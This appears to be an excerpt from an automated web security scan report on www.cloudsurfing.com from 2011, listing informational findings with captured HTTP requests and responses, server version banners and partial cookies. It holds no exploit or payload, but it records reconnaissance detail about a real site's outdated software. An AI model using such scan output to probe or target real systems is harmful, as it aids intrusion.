Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /javascripts/popup.js |
GET /javascripts/popup.js HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cloudsurfing=AoWFXSg |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:13:06 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 Last-Modified: Sun, 09 Jan 2011 03:52:21 GMT ETag: "1b50cc4-bc8-49961c7 Accept-Ranges: bytes Content-Length: 3016 Content-Type: application/javascript .../********************* //@Author: Adrian "yEnS" Mato Gondelle //@website: www.yensdesign.com //@email: yensamg@gmail.com //@license: Feel free to use it, but keep this credits please! /************************ //SETTING UP OUR POPUP //0 means disabled; 1 means enabled; var popupStatus = 0; var fadeSpeed ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /site/1369-Kosmix/buzz/ |
GET /robots.txt HTTP/1.0 Host: www.cloudsurfing.com |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:13:05 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 Last-Modified: Sun, 09 Jan 2011 03:52:21 GMT ETag: "1b4c001-77-49961c7466740 Accept-Ranges: bytes Content-Length: 119 Connection: close Content-Type: text/plain # I, for one, welcome our new robot overlords. User-agent: * Disallow: /company/thumbnail/ Disallow: /site/thumbnail/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
POST /auth/do_create HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 Content-Length: 60 unique_id=2&security_code |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:46 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=EiYiLPo Vary: Accept-Encoding Content-Type: text/html Content-Length: 7277 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/register/ |
GET /auth/register/?email= Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:28 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Content-Type: text/html Content-Length: 7182 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... |